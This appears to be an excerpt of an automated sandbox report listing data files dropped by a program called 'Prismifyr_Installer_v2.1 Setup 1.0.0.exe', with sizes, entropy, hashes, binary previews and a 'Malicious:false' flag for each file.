                                                                                                                                                                                                                        Entropy (8bit):5.631366311772276
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:Qa6OdcQGWLW+fD28mZEN4mNLtVFFKbW0E14i4f/ZbOHu51b4BWFAqZTCO5CoCYJf:BXyQzWGPUBE0HcHu5xFAqZTP5bJhgB8
                                                                                                                                                                                                                        MD5:A49F706E800B0679551442F2E98DAD4F
                                                                                                                                                                                                                        SHA1:E3B505F693C111113FB47C436A8637E8F552FE95
                                                                                                                                                                                                                        SHA-256:EBADE538CF0CA8DE4878F5FF703A18050D7494DD97E2CBA8B0A0F27FE397D468
                                                                                                                                                                                                                        SHA-512:A1F02EF0682727324B7A4F2EECC4BEC3B6E363589C39D3AD63C92D9EF36A6F81C7EBF2FF68922F1966E8635A19AA38D109880526502F9A6C1A240C4272409556
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'s.e.Z...h.b...i.s...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.@...w.l...y.....z.....|.....}.......B.....G.....O.....W....._.....f.....m.....t.....u.....v.....x.............................j...........y...................................j...........`.....}.............................H.......................x...........@.....R...........B.....t...........3...........+.....O...........P.........................................m...........S.....p............ ..... .....!....f!.....!....."....."....p".....".....#.....#....|#.....#.....$....-$.....$....>%.....%.....%.....%....~&.....&.....&....)'.....'.....'.....'....\(.....(.....)....").....).....*....U*....f*.....*.....+.....+.....,....Y,.....,.....,.....,....n-.....-....+.....K............/....?/....N/...../....m0.....0.....0....H1.....1.....1.....1....p2.....2....(3....A3.....3....?4.....4.....4....95.....5....^6....q6.....6....t7.....7.....7....C8.....8.....9.....9....}9.....9.....:....$:.....:....;;.....;
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1448167
                                                                                                                                                                                                                        Entropy (8bit):4.271759959495784
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:FvvbhsMrrmLIcaWyygh4hxn9mMPIPFiKfpBP1zX13dqc9Cuz3ejha+5465MXAfGS:dbhtPwgQKfpBP1zXLRz3eb546WXAu3C
                                                                                                                                                                                                                        MD5:4ADA3D6AFCA7A3536CA56766921A2E11
                                                                                                                                                                                                                        SHA1:22445C79906D71F75486C767E22562FD28FBAE24
                                                                                                                                                                                                                        SHA-256:901C7E8006D1E73A7E8146B383F54DF5D90EA622F0EC4CB5660019ACB8433D4A
                                                                                                                                                                                                                        SHA-512:4AD124E2E57693592403B73D05993FB46B1BC1DFC50D0AB326AE96CD1C1461CD1CD1B4E8CA4445CEDE3F7FF12278D07B3A138201E9028DDDB31E2B4D8B151748
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'|.e.H...h.P...i.a...j.m...k.|...l.....n.....o.....p.....q.....r.....s.....t.....v.....w.Z...y.....z.....|.....}.......0.....5.....=.....E.....M.....T.....[.....b.....c.....d.....i.................&.....r...........D.....3.......................J.................e.....T.......................p.................a ..... .....!....."....."....|#.....#.....$....v%.....%....<&.....'.....(....`).....).....*.....+...._,.....,.....-..........(/....l/.....0.....1....w2.....2....Q4.....5.....6.....6.....7....]8.....8.....8.....9....o:.....:.....;.....;.....<.....<.....=.....=.....>....I?....}?....a@.....@....xA.....A.....B....aC.....C.....D.....D.....E....JF.....F....VG.....H.....H.....H.....I.....J.....K.....K.....L.....M.....N....LN.....O.....O.....P....GP....#Q.....Q.....R.....R.....S.....T.....U.....U.....V.....W.....X....MX....oY....fZ.....[....G[.....\....H].....]....F^....t_.....`....la.....a.....b.....c.....d.....d.... f.....g.....g.....h.....h.....i....Xj.....j.....k.....l.....m
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1194976
                                                                                                                                                                                                                        Entropy (8bit):4.299284484565534
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:aK4MfL6X/05r9BKw9acCsKZKJUPjSHro053mPnkj:3PL6X/CB9acCVZ1PjSHrJ53mPnkj
                                                                                                                                                                                                                        MD5:4768C4DAF4CE9FFDEB3D11CE64E0F3EC
                                                                                                                                                                                                                        SHA1:E4EEBD9C013F0A7857B6678DDD76E51535F82102
                                                                                                                                                                                                                        SHA-256:D1332150DA50884E0CAAF78C36117C0D5958E4B3EA067E3DFE7AE157FEC01DE3
                                                                                                                                                                                                                        SHA-512:E60771B5E55DEFC66DF1C6043F4F3214B71CFF1509D928029BB3A13BCD3C3B665DDFD1426DB300D08C1D978C5F62881CE37D64252C264C495E1B015FF11FE22B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.M...t.d...v.....w.....y.....z.....|.A...}.r...................................................................................7.........................................&.................\..........._.......................@.....l.....?...........Z...........h.....7 ..... ..... .....!.....".....#....^#.....$.....&.....&....?'....](....`).....).....*....U+....U,.....,.....-....M.....k/.....0....T0.....1.....3.....3....&4.....5.....5....C6....}6....@7.....7....58....a8.....9.....9.....:....!:.....;.....;....f<.....<.....=....\>.....>.....>.....?.....@.....@.....@.....A.....B.....B.....B.....C.....D.....D.....E....\F.....G....GH.....H....EI.....I....>J....gJ.....K.....K.....K.....L.....L.....M.....N....5N....^O....YP.....P....oQ....YR.....S....wS.....S.....T.....U....uV.....V.....W.....X....xY.....Y.....[....[\....D]....k].....^....._....i`.....`.....a.....b....8c....gc....8d.....e....ae.....e.....f.....g....+h
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):541878
                                                                                                                                                                                                                        Entropy (8bit):5.251528064733263
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:/LPFWy2DA6axAq2YemRl/B5VTUcjt95b3RSyGADBmvzt:5WywMxH2sl/FL95V9Gv
                                                                                                                                                                                                                        MD5:3DD48ACA5A1B1F54ABEE583B28B03DA7
                                                                                                                                                                                                                        SHA1:D42B7E2252776A7E960A7AEF6B849FE6F6C8CBFB
                                                                                                                                                                                                                        SHA-256:9D1353D27C77B38E18F22E4719F8781DD6C126F86F6A84FF5170D28A202ACA7E
                                                                                                                                                                                                                        SHA-512:F190939C13C2D1AB318084DCA42D8132B723A4BBA775EF547944675F7DB37497BFB45C2391B792091EE4416BDDFF7BEF25F3F707BA1346C5F7EBAB7FEF410C8C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'t.e.X...h.`...i.h...j.t...k.....l.....n.....o.....p.....q.....r.....s.....t.....v.5...w.a...y.....z.....|.....}.......7.....<.....D.....L.....T.....[.....b.....i.....j.....k.....p.............................^.................I.................<.....L...........*.....k.................X.......................`.......................U.......................Z.................).......................J.......................'.....{.......................s.................2.......................Y.............................n.......................A.....h.....t...........; ....u ..... ..... ....C!....x!.....!.....!....9"....k"....u"....."....'#....W#....`#.....#.....$....M$....X$.....$....;%.....%.....%.....%....<&....a&....y&.....&.....'....@'....Z'.....'.....'...."(....3(.....(.....(.....)....:).....).....).....).....)....O*.....*.....*.....*...._+.....+.....+.....,.....,.....-....Y-....g-.....-....6.....q.................C/....q/....~/...../.....0....50....E0.....0.....0.... 1
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):525422
                                                                                                                                                                                                                        Entropy (8bit):5.430748766089203
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:xygOR9ctzl4u5Op7f1MHY+HVbE59KLbSAk7f7t:xYP99+HVbE54LbP4R
                                                                                                                                                                                                                        MD5:8490972014FBED7640AF1C8F2986F8E4
                                                                                                                                                                                                                        SHA1:A7B6823D6BD185EEB726607588C0C6CAD162A77D
                                                                                                                                                                                                                        SHA-256:BABCE9D88ABE13C3B7C99E9A9BC4D61B5A07FFDE4B92951A71CE825988001DC3
                                                                                                                                                                                                                        SHA-512:C60AF35C652B4BD08D0DC9C5289444BB1C83E2CB6F928763E13E7989DD94034FD1D6C9715FADDA0C2B09268B4D1B11823E7FA60BD1AF96883009B81787C439F8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e."...h.*...i.A...j.M...k.\...l.g...n.o...o.t...p.....q.....r.....s.....t.....v.....w.:...y.a...z.....|.....}.........................%.....-.....4.....;.....B.....C.....D.....F.....Q.....`.....s...................................i.............................(.....x.................Z.......................W.......................D.....m.....|...........L.....|...................................j...........7.....V...........0.....h.....|...........|.................w...........T.....v.................#.....1.................. ..... ....j ..... ..... ..... ....S!.....!.....!....."....i".....".....".....#....k#.....#.....$.....$....i$.....$.....$.....$....[%.....%.....%.....%....j&.....&....''....?'.....'.....'.....(....)(.....(.....(.....(.....)....e).....).....).....)....l*.....*.....+....P+.....+.....,....*,....C,.....,.....-....<-....T-.....-..........T.....h...........C/...../...../....!0.....0.....0.....1....y1.....1.....2.....2....c2.....2.....2.....2....F3.....3.....3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):543553
                                                                                                                                                                                                                        Entropy (8bit):5.364700056174464
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:G7JWlbJ9WQusQUWFgY5smc2x5btfmzmkbqqn9/OTy:kolbJ9WQusQUM5smc2x5bFmzmkbqqn9V
                                                                                                                                                                                                                        MD5:B16BA2B8757A30C54B5E2A031455A7A8
                                                                                                                                                                                                                        SHA1:145DD67CEEE8350465539B232F769CC9ED9B697C
                                                                                                                                                                                                                        SHA-256:16B5B42A79CA4A78F75D734F19608C500E79421891216BBDA20BC072733326F9
                                                                                                                                                                                                                        SHA-512:A095107EDF1E288A3BB2382825B1C54ECD6F23D1F9EA215B2C4BF4789E02139B25B2909C8A447BACB2650589B2993B3D96CD7E41D965638C8F78E110D1A54FAC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.$...l./...n.7...o.<...p.I...q.O...r.[...s.....t.....v.....w.....y.)...z.W...|.~...}...............................................................................*.....;.....M...........o.................Y.......................}...........5.....K.................N.....e.................9.....H.......................*.................9.....Z...........2.....i.................G.....|.................V.........................................].................5.............................Z................................................ ....~ ..... ..... .....!....w!.....!.....!....."....W"....."....."....."....6#....b#....o#.....#....+$...._$....n$.....$....J%.....%.....%.....&....Y&.....&.....&.....&....?'....`'....w'.....'....-(....U(....g(.....(....9)....p).....).....)....>*....\*....p*.....*....4+....f+....w+.....+....I,.....,.....,..../-.....-......................./....F/....k/...../....60....g0....|0.....0.....1....C1....S1.....1.....2....C2
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):605870
                                                                                                                                                                                                                        Entropy (8bit):5.768440868411214
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:+7Y5WoOB/kDqOXfQfuzSJY6HAubIoP/CUdse3m2UXMgm/1QhHsB51bT46ewy:+Z2DM31QhU5KF
                                                                                                                                                                                                                        MD5:B1AD1AF029417FA063F253DD8805F18D
                                                                                                                                                                                                                        SHA1:3FE27D6ADFA0AA9E2D83DC3090144B92EA8D29E6
                                                                                                                                                                                                                        SHA-256:0E7AEC76013F6CCFFBE7500B03BACD11A5CFC622F9E090EE2552BEE1BE18C4D7
                                                                                                                                                                                                                        SHA-512:7199B40448CDFC10E6988AAA7FF35F545D94978D4A580F7638350940C0FF645D2989953DE597179AA7C9DDF3AC362492DB99FAE73EE9C034D1CBF9EE8DD361C4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.$...i.5...j.?...k.N...l.Y...n.a...o.f...p.s...q.y...r.....s.....t.....v.....w.,...y.S...z.....|.....}.....................................&.....-.....4.....5.....6.....8.....G.....U.....j.............................#.................+.....>...........S.......................{.................5...............................................O...................................O.....t...........>.....v.................S................. ...................................j.................*.....?.....`.................. ...., ....u ..... ..... ..... ....U!.....!.....!....."....c".....".....".....#...._#.....#.....#.....#....P$.....$.....$.....$....@%.....%.....%.....%....W&.....&.....'....1'.....'.....'.....'.....'...._(.....(.....(.....(....K).....).....).....)....m*.....*.....+....F+.....+.....+.....+.....,....y,.....,.....,.....-.....-.....-....1.....K...........>/...../...../....+0.....0.....0.....1....i1.....1.....1.....1....F2.....2.....2.....2....*3.....3.....3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):568824
                                                                                                                                                                                                                        Entropy (8bit):5.424090078895697
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:ikRiNLcbEOeqq5QNBXBLQSL4yPN5hDXFmW1sRgMCrX:ihcbEOen525ZXPsR9CT
                                                                                                                                                                                                                        MD5:8074F94BD6A849CA9CF45E1DB07A02E9
                                                                                                                                                                                                                        SHA1:EE73C512604D55D11332B904BB6200CBCC4218EC
                                                                                                                                                                                                                        SHA-256:119071C3574CBD1E5CC183CA046F50A2137E867BC410FD4A44DF36EE7CF7DB3F
                                                                                                                                                                                                                        SHA-512:5BE036D8798306780F17D759947064EF456EF5A511A7EF2253DA09AD06DFF4E2831794F8DBE72F23B551CCF8C5252278815B21B266931F99F27C7764E342ECD4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e. ...h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...q.....r.....s.....t.....v.....w.2...y.Y...z.....|.....}...............................%.....,.....3.....:.....;.....<.....A.....S.....c.................*.................1.................1.....A...........^.................@.......................B.......................'.....~.................S.................3...........(.....p.................k.................(.......................V.................-...........9.......................J.....p.................: ....p ..... ..... ....7!....l!....z!.....!....@"....{"....."....."....9#....j#....v#.....#.....$....F$....P$.....$.....$.... %....*%.....%.....%.....&....0&.....&....+'....}'.....'.....'....3(....W(....l(.....(.....)....*).....).....).....*.....*.....*.....+....R+.....+.....+.... ,....9,.....,.....,.....-.....-.....-.....-....4.....P...........P/...../...../....M0.....0.....1....31.....1.....1.....2.... 2....q2.....2.....2.....2....l3.....3.....4....-4.....4
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):572356
                                                                                                                                                                                                                        Entropy (8bit):5.399170343779364
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:higrtjhtWK++5QBieJVJJxh2D43RfZRI5ejB/9SRIh:higvA+eI5ejB1SRA
                                                                                                                                                                                                                        MD5:58F85DFAEB98EC09CE1D5E4001414062
                                                                                                                                                                                                                        SHA1:4A425E3DD507D4E24E47DA08A752A414EEEBBCAD
                                                                                                                                                                                                                        SHA-256:6665BB3614DB52493D62A4A7599A0F70D87A9360B6463B4EB9D52BDA97267B39
                                                                                                                                                                                                                        SHA-512:B7C886A64D993889135E2DE6EA47ED725850916FCE2C1D3581DA82185EABE466DC143F124E5793F372BF6CD39E7D59A68264250D5817979952D8BC73B943C594
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'r.e.\...h.d...i.u...j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.B...w.n...y.....z.....|.....}.......D.....I.....Q.....Y.....a.....h.....o.....v.....w.....x.....}.............................Y...........A.....^...........).....t...............................................<.....`.................-.....=.......................#.................S.................a.................1.......................P.......................m...........".....7...........-.......................Y.......................G ....x ..... ..... ....J!.....!.....!.....!....Z"....."....."....."....[#.....#.....#.....#....>$....k$....u$.....$.....%....D%....N%.....%.....&....9&....J&.....&....('....x'.....'.....'....8(....b(....~(.....(.....(.....)....().....).....).....*....3*.....*.....+....Y+.....+.....+....",....L,....^,.....,.....-....B-....W-.....-..........f............/...../...../...../....y0.....0....01....T1.....1....72....w2.....2.....2....+3....P3....e3.....3....34....o4
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):593139
                                                                                                                                                                                                                        Entropy (8bit):5.453540423426423
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:z+nmepgF/eM6PXEvTpGKdjOoTxatgVSK0GFq584xUXqs2u2/t2E3:CmepuedXEv8KBOo9aoFJq58CUv2/p3
                                                                                                                                                                                                                        MD5:C93F9732B24292D5B4E9FB5076127107
                                                                                                                                                                                                                        SHA1:9BA57F6AD8437405588D86548EFB02945A530F03
                                                                                                                                                                                                                        SHA-256:D01A6CAF125CECB2BC232A00039C4C8422C88B2D5EC374C89A6CB0117E8EF33F
                                                                                                                                                                                                                        SHA-512:C51015B24B1A73540648B4338DA33783E7E4685317A60F64566CB3EB2366A4BD27114F96DB1541F553E626F15FFBC95BEC78F562E93613DE935509E76DDC2AEE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h. ...i.1...j.;...k.J...l.U...n.]...o.b...p.o...q.u...r.....s.....t.....v.....w.(...y.O...z.}...|.....}.....................................".....).....0.....1.....2.....4.....C.....O.....].....o.............................`...................................d.................l.................!.....w.......................S.....|.................q.................^.................2.................X.....q...........4.....h.....}...........S.................@.................>.............................g.......................8 ..... ..... ..... .....!....u!.....!.....!....."....o".....".....".....#....W#.....#.....#.....#....-$....S$....c$.....$.....%....D%....X%.....%....P&.....&.....&.....'....W'....v'.....'.....'....'(....G(....k(.....(....,)....[)....n).....)...._*.....*.....*....6+....y+.....+.....+....',.....,.....,.....,....R-.....-.....-.....-....w...........I/....b/...../....S0.....0.....0....61.....1.....1.....1....:2.....2.....2.....2....<3.....3.....3
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):975006
                                                                                                                                                                                                                        Entropy (8bit):4.8399611448975195
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:OHKqm+fQjRo4YSWPAY+zJ9ZF1WAavd/96HzW/yqSvDs/m1sXel+YHVeXN2hVO3j9:oKqmut5/3rb
                                                                                                                                                                                                                        MD5:94D946AC5ACE00800D331DD4A34491ED
                                                                                                                                                                                                                        SHA1:312D5A7EB279B7BCB770D885F706D3B6570FDA4F
                                                                                                                                                                                                                        SHA-256:55115E738615F0CEF631DA4FF14FC261B370CA469840C21EE11ABB699A49DA8C
                                                                                                                                                                                                                        SHA-512:62AF857D63EA3A479F29C5BDE424F866281B9BE29527950F68F68A83C95E109E338F301D16C88A2512382FEAFD1BD7EB509D75A74601A29C222FA6706D059DDC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........"';.e.....h.....i.....j.....k.....l.....n.....o.....p.#...q.)...r.5...s.d...t.{...v.....w.....y.....z.1...|.X...}...............................................................................".....:.....a.....V....."...............................................B.............................E.......................6.....Y.................O.....f.......................H.....;.......................x...........]...........9 ..... .....!....?!.....!....."....!#....N#....R$....L%.....%.....&.....&.....'....['.....'.....(.....(.....(.....(....]).....).....).....*.....*.....+....V+....{+....!,.....,.....,.... -.....-....#.....^.....u...........r/...../...../....@0.....0.....0.....0.....2.....2....]3.....3.....4.....4.....4.....4....R5.....5.....5.....5....z6.....7.....7.....7.....8....,9.....9.....9....z:.....:.....;.....;.....;....E<.....<.....<.....=.....=....k>.....>....h?.... @.....@.....@.....A.....B.....C....jC.....D.....D.....D.....D....vE.....E....$F....=F.....G.....G....2H
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):612854
                                                                                                                                                                                                                        Entropy (8bit):5.813093030677285
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:1PFFdbkpIh4di1i5JAY5Evvw3QXtWTjsxt90g:PFdzciY5gwIPtCg
                                                                                                                                                                                                                        MD5:E61D8CDF7F7FE4DADA93A04ED91A9B83
                                                                                                                                                                                                                        SHA1:8553D0345BE95D506A21C4E62149858FECA51F56
                                                                                                                                                                                                                        SHA-256:9B87EA25180BB8DDDAB69359D41D594F1A594F87EC75EB201F6BCA6AC87B488E
                                                                                                                                                                                                                        SHA-512:CF73149982C81E26D1C3BD73CB1CF6D4B1C8AC59D5E0C1777E92D420BC56E78FCAF737DA785578CB95D2E8B61C1D8A828A0EEAD147B5934EB764B64F6E91ADC0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e."...h.*...i.>...j.J...k.Y...l.d...n.l...o.q...p.~...q.....r.....s.....t.....v.....w.7...y.^...z.....|.....}.........................".....*.....1.....8.....?.....@.....A.....C.....W....._.....q...........B...........^.....|...........].................7.................%................./.....F.................D.....W.................9.....M...........&.....[...............................................<.....U...........8.....n...................................t...........R.....m...........# ....C ....X ..... .....!....?!....Q!.....!....."....9"....K"....."....+#....i#.....#.....#....\$.....$.....$.....$....h%.....%.....%.....&.....&.....&.....&.....'.....'.....'.....'.....(.....)....T)....l).....).....*....'*....;*.....*.....*.....+....!+.....+.....+....#,....3,.....,....0-....u-.....-..........S.....o............/....b/...../...../....)0.....0.....0.....0.....1....+2.....2.....2....&3.....3.....3.....3...._4.....4.....4.....5....\5.....5.....5.....5....o6.....6....!7
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):588186
                                                                                                                                                                                                                        Entropy (8bit):5.4894258963470834
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:o0MGJWb3cB2FXoFPy53rfpWJU1ui/fzxlqc:oVGJoXkPy53rfgi/fzx7
                                                                                                                                                                                                                        MD5:6A65B44554925033A095F999245EE4C4
                                                                                                                                                                                                                        SHA1:3E0F0C96065729DCB852E27F54FEBDDE6E715153
                                                                                                                                                                                                                        SHA-256:771D38370DA66E3E38EC1266B8191F75E0981B54E1133BEA77A72C1DDC84C1FE
                                                                                                                                                                                                                        SHA-512:692B4F9009305CBC4959C4890723EC71A0668D7D4235599995727A8DD140865243A8330C43D2EF14847CF4E06B1851EAAEC731D4DB1038F6A07B4B8931D40DBC
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.(...l.3...n.;...o.@...p.M...q.S...r._...s.....t.....v.....w.....y.-...z.[...|.....}.........................................................................$.....2.....B.....U...........t.................P...................................T.....s...........?.....s.................>.....i.....v...........1.....\.....k...........M.................&.......................c................. .................+.....?...........9.....p...........*.................!.....|.......................Z.......................E ..... ..... ..... ....Q!.....!.....!....."....t".....".....#.....#.....#.....$....A$....V$.....$.....%....@%....S%.....%.....&....H&....W&.....&....2'....o'.....'.....'....>(....^(....v(.....(....#)....A)....\).....).....*....b*....t*.....*....U+.....+.....+.... ,....r,.....,.....,.....-....~-.....-.....-....9......................../....50.....0.....0....p1.....1....F2.....2.....2....Z3.....3.....3.....3....A4...._4....o4.....4....O5.....5
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):905278
                                                                                                                                                                                                                        Entropy (8bit):4.764362525250864
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:u2uMrsTd7M3KS7PISzNSzdV/Jui4til40b95YLEqu0xjHgV37n5Di/k/0:VuFIuv595guWp
                                                                                                                                                                                                                        MD5:755D73BE3227055EF6CC084CDF8E2C2B
                                                                                                                                                                                                                        SHA1:B1894B1A8E53393D75907DFB2E88806581FC00A8
                                                                                                                                                                                                                        SHA-256:8C31D207616B081E016A5DF4E67DABFABE37072F1BCDA1CDAA64EA4D935EE694
                                                                                                                                                                                                                        SHA-512:79029204F641D07B9D729715FF1CFB0D396353729FBF40BBCB25A7DFF3C843A9A054D7E38849AA1C87EF2014D83E864C1CD30B8265A7928778EAD690DD4E0A93
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.6...i.G...j.S...k.b...l.m...n.u...o.z...p.....q.....r.....s.....t.....v.....w.@...y.g...z.....|.....}...................#.....+.....3.....:.....A.....H.....I.....J.....L.....v.........................................`.....$...........1.....T.....O.............................[.......................7.................6.............................p.............................K ..... ....Q!.....!....P"....y"....5#.....#.....$....S$....9%.....%....p&.....&.....'.....(....()....d).....)....d*.....*.....*....P+.....+.....+.... ,.....,.....-....U-....t-....8...........9/....d/.....0.....0.....0.....0.....1.....2...._2....z2.....3.....3.....3.....3.....4....,5....|5.....5....i6.....7.....7.....7....S8.....8.....8....$9.....9....3:....l:.....:....S;.....;....2<....O<.....=.....=.....>....j>.....?....s?.....?.....?.....@....%A....zA.....A.....B.....C.....C.....C.....D....tE.....F....(F.....G.....G..../H....yH....3I.....I.....J....3J.....J.....K....fK.....K....TL.....L....iM
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):528661
                                                                                                                                                                                                                        Entropy (8bit):5.545708741277744
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:wQ/ltJdLpItV1QdjT6shgjCCx//Gl9dB+4RFcz5RtGl5nYF4tkvMmSO5DE/xJa5z:1ttjLp/djTaCUL50rF2MC
                                                                                                                                                                                                                        MD5:880F07AC4356D10EFBBEB620CC8A2D43
                                                                                                                                                                                                                        SHA1:2E3832AEB4E3D5D06B7B8D7E3754A6272E784D37
                                                                                                                                                                                                                        SHA-256:3C234EA7524FBEAEE25461CF7E5A11A0DF851E6D58B63505158EF12F2501F6E3
                                                                                                                                                                                                                        SHA-512:BC40FF232C56B9154B78F9BCA1C9266A3F773B595D4F4C64FF1D49ACD6A3278B477EE584DBF0D84179F5B027C5EEC0708C4943929961D1EA4CF697558F6B2CCA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.........'..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.D...t.[...v.....w.....y.....z.....|.8...}.i...........................................................................................................e.....{...........N.........................................q.................*.....~.......................~................. .................=.....]...........K.......................i.........................................Q................./...........Z.................(.....z.......................[.......................9 ...._ ....n ..... ....>!....u!.....!.....!....B"....p"....."....."....4#...._#....n#.....#....$$....O$...._$.....$...."%....T%....c%.....%....6&....q&.....&.....&....1'....Q'....j'.....'.....(....%(....=(.....(.....(.....(.....).....).....).... *....P*.....*.....+....#+....9+.....+.....+.....,....2,.....,.....,....&-....<-.....-....@.................+/...../...../...../....c0.....0.....0.....1....R1.....1.....1.....1....*2.....2.....2
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):556810
                                                                                                                                                                                                                        Entropy (8bit):5.3413166108939265
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:vslxH+kGrKJpdscpU5QmedqrCBfRdBFUQbQW47TxEaFqYJjNegarCgMje15Z1/hz:0lxHZKC15//B
                                                                                                                                                                                                                        MD5:98DD12A836DF0E3967B8FCF44B18F8C4
                                                                                                                                                                                                                        SHA1:4762B7F8E5FD1B92C6984B76D4E965C32389CC05
                                                                                                                                                                                                                        SHA-256:C8F6CD8602059E6FD7A1289B9A268D4DDAA1C2ECDEF7A9D05EC4BDE9BFD9C444
                                                                                                                                                                                                                        SHA-512:F2046FE9ECE161B6E39BF94C347E920ED3EAAC7D05846270ED847011E319CC61D0BA01C4E80B603EDD9E5AE4E3461029627A9A913A10180A311D373AD07520FC
                                                                                                                                                                                                                        Malicious:false
